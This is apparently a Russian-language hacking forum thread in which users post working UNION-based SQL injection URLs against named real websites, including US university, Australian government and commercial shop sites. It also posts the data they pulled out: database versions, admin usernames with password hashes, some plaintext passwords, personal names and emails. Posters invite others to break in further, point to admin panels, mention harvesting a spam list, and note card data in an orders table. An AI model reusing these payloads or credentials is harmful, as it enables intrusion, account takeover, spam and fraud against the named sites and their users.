SQL Инъекции

Продолжаем тему edu =)
1й пошел =)
сайт: http://www.bme.gatech.edu
уязвимость:

HTML:

http://www.bme.gatech.edu/people/faculty_record.php?id=-1'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

инфо:

Code:

 
Database Version: 4.1.22
Database name: faculty
User name: web@localhost

2й

Сайт: https://its.kennesaw.edu/
Уязвимость:

HTML:

https://its.kennesaw.edu/cms/index.php?id=-1+Union+select+1,2,3,version(),5/*

Инфо:

Code:

 
Database Version: 4.0.17-standard-log
Database name: cms
User name: cms@localhost

3й

Сайт:http://www.uhh.hawaii.edu/
Уязвимость:

HTML:

http://www.uhh.hawaii.edu/academics/hohonu/writing.php?id=-1+union+select+1,version(),3,4,5,6/*

Инфо:

Code:

 
Database Version: 4.1.22-log
Database name: hohonu
User name: [email protected]

4й

Сайт:http://dispatch.fandm.edu/
Уязвимость:

HTML:

http://dispatch.fandm.edu/category.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*

Инфо:

Code:

Database Version: 4.1.22-log
Database name: dispatch
User name: dispatch_reader@localhost

Еси кто расковыряет дальше то стучите самому лень так как 4я версия %)

 

Code:

http://www.pro-xenon.ru/news.php?id=-1+union+select+1,concat(username,0x3a,user_password),3+FROM+phpbb_users+limit+1,1--

логин/пасс:

Code:

ProXenon.Ru:e25325d4885c130ab5b652109adef63f

------------------------------------------

Code:

http://nigatrade.biz/realty/zakaz.php?id=-1+union+select+1,2,3,4,concat(name,0x3a,pwd),6,7,8,9,10,11,12+FROM+admins--

логин/пасс:

Code:

rgk:686ff67efba121e906356233872afd2d

-------------------------------------------

Code:

http://katalog.motorky.com/moto.php?id=-150+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8,9+FROM+phpbb_users+limit+1,1--

логин/пасс:

Code:

2 admin:bec47636b1594d444b88ec9eb4f15c7a

---------------------------------------------

Code:

http://yalta.org.ua/pages/person.php?id=-1+union+select+1,2,3,concat(nick,0x3a,password,0x3a,name,0x3a,email,0x3a,status),5,6,7,8,9,10,11,12,13,14+FROM+user_data--

логин/пасс/имя/мыло/работа/статус:

Code:

Alex:1010:Игорь Данилов:[email protected]:0

--------------------------------------------

Code:

http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,1/*

логин/пасс/мыло/ася/имя:

Code:

administrator:e04796528f705256f97a8c290bfd3070:[email protected]

Code:

http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/*

Собираем спам-базу
--------------------------------------------

Code:

http://ron.the-underdogs.info/game.php?id=-135+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*

логин/пасс:

Code:

root:4bca6e21230d24de  flashback:4e62830249e37403
 ron:1b4fdeb00b833ac5  macgarden:4a5fe7e15ca085b0  Underdogs:4bca6e21230d24de  doggie:69288c4855bbb52a 
forum:3bd00f75423ddffd 
hotu:3213f1351227ad25  
community:4dfedf012cc6837d 
zzt:0e5829ac32cde319  
john_doe:70520cc9573c1cd3  phpAds:58efd1e0451c7a6c

-------------------------------------------------

Code:

http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin

Code:

http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin

логин/пасс:

Code:

Need4speed08:d2357411549940e64b552c99e78a1035

--------------------------------------------------
The End!

 

http://www.marotori.com/news.php?id=2+union+select+1,2,3,4,5,6--

Довольно нехилое портфолио у них в общем понравилось мне там.

Database Version: 5.0.67-log
Database name: marotor_site
User name: [email protected]

In database marotor_apa_datafeed found table datafeed_authentication
0 : id
1 : auth_username
2 : auth_password
3 : auth_ip
4 : enable
5 : currency_id

[1]:11:approvedie:gogo123:91.186.19.1691.186.19.12990.207.170.23983.136.71.11590.207.70.121:1:3
[2]:12:approveduk:gogo123:91.186.19.1691.186.19.12990.207.170.23983.136.71.11577.44.50.42:1:1
[3]:13:telegraph:letmeinnow:91.186.19.1690.152.10.14891.186.19.12981.157.123.20891.109.166.13591.186.19.28:1:1
[4]:14:readersdigest:gogo123:91.186.19.1691.186.19.129:1:1
[5]:15:approvedgolf:gogo123:91.186.19.1691.186.19.129:1:1
[6]:16:sandersonyoung:gogo123:91.186.19.1691.186.19.129:1:1

Я так понял пароли открыты но вот че то дальше не смог.
Может не там копался помогите...

Тут админка если че. http://www.marotori.com/admin/

 

Может кто захочет доковырять до конца, мне лень

1) 4.1.11-Debian_4sarge2

http://www.drumshop.co.uk/product.php?id=99999/**/union/**/select/**/1,22,23,24,unhex(hex(version())),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--

2) 5.0.45-community-nt

http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

 

Смотрим в заголовок 4.1.11-Debian_4sarge7
http://briefing.defenceandindustry.gov.au/category.php?id=-8+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12,13/*

Швейцарские горлопаны в австралии
http://www.swiss.org.au/member.php?ID=-20+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.21-standard-log, таблица members есть, дальше не копал.

 

http://hotelsaustri adirect.com/index.php?mod=re_search&ad=-7+union+select+1,2,3,4,concat(username,0x3e,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--

 

Code:

http://ukrgazeta.plus.org.ua/article.php?ida=-594+union+select+1,2,3,4,5,6,7,8,9,10/*

user(): u_plus@localhost
database(): plus
version(): 4.1.22

//можете поздравить, у мну завтро днюхо!))

 

http://www.fo-ra.ru/news.php?id=2 +union+select+1,version(),user(),database()--
5.0.67-log
[email protected]
u152033_fora

//faza02 с днюхой тебя хех,а у меня через 3 дня -)

 

Your One-Stop Shop For Everything Lovely

Code:

https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--

Админки не нашел.

 

Code:

http://www.indwesgear.com/item.php?id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Заказ номера в С. Петербурге

Code:

http://www.booking-all.com/order.php?id=-2+union+select+concat(admin_name,0x3a,admin_pass)+from+admin--

 

http://www.imperialtouch.com/page.php?id=-25+union+select+1,2,concat_ws(0x3A3a,version(),database())/*

4.0.27-max-log::itadmin
________________________



http://www.ciaovillas.com/city_vacation_rentals.php?id=76&list=58&state=-39+union+select+concat_ws(0x3A3a,version(),database())--

5.0.68-log::Sql139072_1

 

Код:
https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--

Цитата:marlee:d89da8338e706977fc6c5902abac3ebe


Админки не нашел.

то FNS robots.txt смотрел ?

 

тИЦ 325, PR 4

 

..

 

..

 

единственная найденная мною таблица - news

 

..

 

http://file-ma iler.com/faq_man/catagorie.php?cat_id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,admin_pass),5+from+faq_admin--

oka:d13f0c63fc5bfb88b9aca27d1888551d

 

Shop. Вроде как диджейское оборудование и иже с ними.

http://www.spectrumaudio.com/manprods.php?id=-69+union+select+1,concat_ws(0x3A3a,database(),version()),3,4--

spect9_spectrumaudio::5.0.51a-community

Дампим. Есть цэцэ кому интересно в таблице ордерс, они хешированы. Есть админские данные, админку не нашёл (или не искал?)) Не интересно.

http://www.spectrumaudio.com/phpinfo.php